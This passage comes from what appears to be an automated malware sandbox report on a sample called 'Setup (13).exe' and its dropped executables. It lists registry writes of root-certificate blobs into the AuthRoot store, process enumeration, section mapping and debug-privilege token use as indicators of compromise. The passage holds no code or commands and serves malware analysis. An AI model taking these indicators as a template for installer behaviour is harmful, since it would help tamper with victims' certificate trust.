\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Setup (13).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 0lCH1Ut0rTj5YwZRc84Tmco6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 0lCH1Ut0rTj5YwZRc84Tmco6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 md8_8eus.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e md8_8eus.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 nMuZyyhT5O_3WsNSlSv73SXg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a nMuZyyhT5O_3WsNSlSv73SXg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C Setup (13).exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Setup (13).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Setup (13).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Setup (13).exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 0lCH1Ut0rTj5YwZRc84Tmco6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a nMuZyyhT5O_3WsNSlSv73SXg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1968 Setup (13).exe 268 XgAOyfoaY_gWudB0duDCIif0.exe 268 XgAOyfoaY_gWudB0duDCIif0.exe 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found 1352 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1352 Process not Found 2752 WerFault.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 268 XgAOyfoaY_gWudB0duDCIif0.exe 2144 grwbiru -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeShutdownPrivilege 1352 Process not Found Token: SeShutdownPrivilege 1352 Process not Found Token: SeDebugPrivilege 2480 taskkill.exe Token: SeShutdownPrivilege 1352 Process not Found Token: SeShutdownPrivilege 1352 Process not Found Token: SeShutdownPrivilege 1352 Process not Found Token: SeShutdownPrivilege 1352 Process not Found Token: SeShutdownPrivilege 1352 Process not Found Token: SeDebugPrivilege 2752 WerFault.exe Token: SeShutdownPrivilege 1352 Process not Found Token: SeShutdownPrivilege 1352 Process not Found Token: SeShutdownPrivilege 1352 Process not Found Token: SeShutdownPrivilege 1352 Process not Found Token: SeDebugPrivilege 2504 LeeKCzrU8Y4sx3Rz3YcSn8vW.exe Token: SeDebugPrivilege 1072 YZT8Iy2essV8eBCyCTScl2gF.exe Token: SeDebugPrivilege 2024 FnoYhdabwbrzrHiHCL15DRod.exe Token: SeDebugPrivilege 2300 BCtt60lUb4bJD5DgNhLBbnte.exe Token: SeDebugPrivilege 1656 hT4cFg82frtRHsFZ3p8gcUUq.exe Token: SeDebugPrivilege 1504 109S01oV51BahE7P5FmiO7My.exe Token: SeDebugPrivilege 864 _gCsOx8e0Q1gmCuJDgeQu9c7.exe Token: SeDebugPrivilege 1156 nMuZyyhT5O_3WsNSlSv73SXg.exe Token: SeDebugPrivilege 1492 Yoo8p966jHdZsA9XlwCAc2n0.exe Token: SeDebugPrivilege 2520 98YNxWCS2514X0PHpDcFbBcb.exe Token: SeDebugPrivilege 1768 hKLxWAmB6h_lA9ugEvBwxrPL.exe Token: SeDebugPrivilege 600 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe Token: SeDebugPrivilege 3064 powershell.exe Token: SeShutdownPrivilege 1352 Process not Found Token: SeShutdownPrivilege 1352 Process not Found Token: SeDebugPrivilege 1764 6BDD.exe Token: SeDebugPrivilege 2700 qRG_IfzvZMtWyuZt1IW5wOCu.exe Token: SeDebugPrivilege 2772 powershell.exe Token: SeDebugPrivilege 1856 qRG_IfzvZMtWyuZt1IW5wOCu.exe Token: SeImpersonatePrivilege 1856 qRG_IfzvZMtWyuZt1IW5wOCu.exe Token: SeDebugPrivilege 3068 powershell.exe Token: SeShutdownPrivilege 1352 Process not Found Token: SeShutdownPrivilege 1352 Process not Found Token: SeDebugPrivilege 2608 B7CC.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
